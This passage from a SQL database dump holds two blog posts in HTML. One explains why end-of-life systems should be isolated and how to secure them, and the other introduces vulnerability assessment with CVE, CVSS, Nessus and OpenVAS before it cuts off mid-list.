[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Risks and 
Vulnerabilities of Using EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using EOL systems without proper protective measures is akin to leaving your front door wide open. Here\'s why these systems are so dangerous to organizational security:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Lack of Security Updates</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once a system reaches EOL status, developers stop releasing updates and patches. Any vulnerabilities discovered post-EOL will remain unaddressed, leaving the system wide open to attackers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Increased Attack Surface</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers actively exploit known flaws in outdated systems, targeting organizations that rely on unsupported software. This effectively makes EOL systems a high-priority target for cybercriminals.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Compliance Issues</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reliance on unsupported systems may violate industry regulations like GDPR, HIPAA, or PCI-DSS. 
This can result in fines, legal penalties, and damage to your organization\'s reputation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Operational Risks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond security, outdated systems pose other operational risks, such as performance issues, lack of vendor support, incompatibility with modern hardware, and software conflicts.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Isolating EOL Systems from the Main Network</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Given these risks, isolating EOL systems from your organization\'s main network is crucial. Doing so helps reduce exposure and safeguard your broader network. Here\'s how network isolation can mitigate the risks associated with EOL systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Minimizing Exposure</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By isolating an EOL system, you effectively limit its interaction with other systems and users on the network, reducing the likelihood of an attack spreading.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. 
Network Segmentation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Techniques like Virtual LANs (VLANs), air-gapping, or using firewalls help create distinct zones within your network. These zones can restrict access to EOL systems, making them harder to breach.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Real-World Example</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider a manufacturing firm using EOL software to control industrial machinery. When their network was attacked, segmentation ensured the breach was contained to low-priority systems, saving their production line from disruption.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Alternatives for Organizations Dependent on EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For organizations that cannot immediately replace their EOL systems, adopting alternative strategies is essential to reduce risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Virtualization</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Run EOL systems within virtual machines (VMs) to isolate them from your core network. 
Keep in mind that virtualization by itself does not isolate a system from the network; that still depends on which segment the virtual NIC is attached to and on the firewall rules around it. What virtualization adds is a management layer: snapshots for rollback, easier monitoring, and independence from aging physical hardware.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Dedicated Hardware</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Place EOL systems on standalone, non-networked hardware to eliminate network-based threats. Removable media and physical access then become the main remaining attack vectors, so restrict USB use and control who can reach the machine. While not ideal for all use cases, this approach minimizes exposure.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Network Segmentation</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use firewalls and VLANs to create dedicated zones specifically for EOL systems, restricting communications to only essential services. A VLAN on its own only separates traffic at layer 2; the real isolation comes from default-deny firewall rules or ACLs between zones, applied in both directions so the EOL host can neither be reached from nor reach out to the rest of the network except over the flows you explicitly allow.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Third-Party Support</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some vendors offer extended support for widely used EOL software. 
These services can include custom patches, monitoring, and technical assistance.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Securing EOL Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you\'re isolating EOL systems or strategically using them within your enterprise, implementing robust security measures is essential to minimize risk.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Conduct Regular Vulnerability Assessments</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like <b><strong class=\"font-bold\">Nessus</strong></b> or <b><strong class=\"font-bold\">OpenVAS</strong></b> to identify and address vulnerabilities. Legacy and industrial systems can be fragile, so test scan profiles in a lab first and prefer credentialed or passive scanning where an aggressive active scan could disrupt production.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Schedule frequent assessments to ensure your systems remain as secure as possible.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. 
Implement Strong Access Controls</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Restrict access to EOL systems using the principle of least privilege.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enforce multi-factor authentication (MFA) to make unauthorized access more challenging. If the legacy system cannot support MFA natively, enforce it on the access path instead, for example on a jump host or VPN gateway that is the only route into the isolated segment.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Apply Patch Management Strategies</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Look for community-supported patches or updates, but treat them as untrusted code: verify their source and signatures and test them in isolation first, since an unvetted patch can introduce the very compromise you are trying to prevent.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">If patching isn’t possible, implement compensating controls, such as monitoring or additional firewalls.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. 
Monitor Network Traffic</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use tools like intrusion detection systems (IDS) or intrusion prevention systems (IPS) to constantly monitor for suspicious activity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Regularly review logs to identify unusual actions that may indicate compromise.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Develop Backup and Recovery Plans</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly back up EOL systems to minimize downtime in the event of a breach or failure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Test recovery procedures to ensure minimal disruption when the time comes.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of IT Security Experts and System Administrators</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing EOL systems isn’t a one-time effort; it requires continuous vigilance from your IT security team and system administrators.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] 
pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Proactive Monitoring</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT security professionals should constantly monitor the health and activity of EOL systems, flagging anomalies before they escalate into threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Incident Response Planning</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every organization should develop and maintain an incident response plan that specifically addresses EOL-related vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Employee Training and Awareness</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Educating employees about the risks of EOL systems and the importance of adhering to isolation measures can prevent accidental breaches.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. 
Advocacy for Modernization</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT leaders should advocate for transitioning away from EOL systems wherever possible, presenting executives with cost-benefit analyses to push for upgrades.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EOL systems and applications remain an operational necessity for many organizations. While they can\'t always be eliminated, the risks they pose cannot be ignored. By isolating these legacy technologies from the main network, implementing stringent security measures, and exploring alternatives like virtualization, organizations can continue using EOL systems without compromising their cybersecurity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For cybersecurity enthusiasts, testing these strategies in a controlled lab environment can refine skills and provide hands-on experience in securing legacy systems.</p>', '', NULL, NULL, 1, 'draft', '2025-01-27 13:00:11', '2026-01-12 21:41:44', 'Information Security', 'Why Isolating End-of-Life (EOL) Systems is Critical for Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(55, 'How to Perform a Basic Vulnerability Assessment', 'how-to-perform-a-basic-vulnerability-assessment', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats are evolving, targeting organizations and individuals alike. Conducting a thorough vulnerability assessment is a crucial step in safeguarding systems against potential attacks. But how do you begin this process, and why are CVE (Common Vulnerabilities and Exposures) and CVSS (Common Vulnerability Scoring System) so vital? This guide will walk you through everything you need to know to perform a basic vulnerability assessment effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Vulnerability Assessment?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A <b><strong class=\"font-bold\">vulnerability assessment</strong></b> is the process of identifying, evaluating, and prioritizing vulnerabilities in systems, networks, and applications. The goal is to detect weaknesses before bad actors can exploit them. 
Whether you\'re managing a corporate IT infrastructure or securing your home computer, vulnerability assessments are vital for proactively managing risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Vulnerability Assessment Important?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preempt Threats</strong></b>: Identifying vulnerabilities before they can be exploited can save you from costly breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Build a Stronger Security Posture</strong></b>: It helps strengthen your defenses and stay compliant with regulatory standards.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Prioritize Risks</strong></b>: Not all vulnerabilities are equal—this process helps you focus on those that pose the greatest danger.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Common Vulnerabilities and Exposures (CVE)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">CVE</strong></b>, or Common Vulnerabilities and Exposures, is a standardized list of publicly known software vulnerabilities. 
Each CVE has a unique identifier (e.g., CVE-2024-12345), making it easier for security professionals to share and act on information about specific threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Does CVE Matter?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Standardized References</strong></b>: CVE makes it possible for different organizations, tools, and experts to communicate effectively about vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Quick Identification</strong></b>: Knowing the CVE number of a vulnerability helps locate detailed information and actionable fixes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Global Relevance</strong></b>: Security tools like Nessus and OpenVAS often reference CVEs to explain their findings.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to the Common Vulnerability Scoring System (CVSS)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While CVE identifies vulnerabilities, the <b><strong class=\"font-bold\">Common Vulnerability Scoring System (CVSS)</strong></b> assigns them a severity score on a scale of 0 to 10. 
This score helps prioritize which vulnerabilities to address first.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Does CVSS Work?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CVSS calculates a vulnerability\'s severity from three metric groups; note that the score shown by NVD or a scanner report is normally just the Base score, and the Temporal and Environmental adjustments are yours to apply:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Base</strong></b> (exploitability and impact)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Temporal</strong></b> (how mitigations or fixes reduce risk over time)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Environmental</strong></b> (the specific impact on your environment)</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Severity Levels:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">0.1–3.9 → Low (a score of 0.0 is rated None)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">4.0–6.9 → Medium</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"3\">7.0–8.9 → High</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">9.0–10.0 → Critical</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding CVSS allows IT professionals to prioritize vulnerabilities that pose the most significant risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools for Performing a Vulnerability Assessment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are many tools available for vulnerability scanning. Here, we’ll focus on <b><strong class=\"font-bold\">Nessus</strong></b> and <b><strong class=\"font-bold\">OpenVAS</strong></b>, two of the most popular options.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
Nessus</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Key Features</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive plugin library</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detailed reporting</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Integration with CVE and CVSS databases</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">How to Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Download and install the software.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Configure scan settings (e.g., target IPs or URLs).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Analyze the results and focus on vulnerabilities with higher CVSS scores.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
OpenVAS (Open Vulnerability Assessment Scanner)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Key Features</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Open-source platform</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regular updates with new vulnerability definitions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Support for scanning networks, services, and applications</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">How to Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Set up OpenVAS on a server or virtual machine.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Define the scope of the scan and start scanning.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 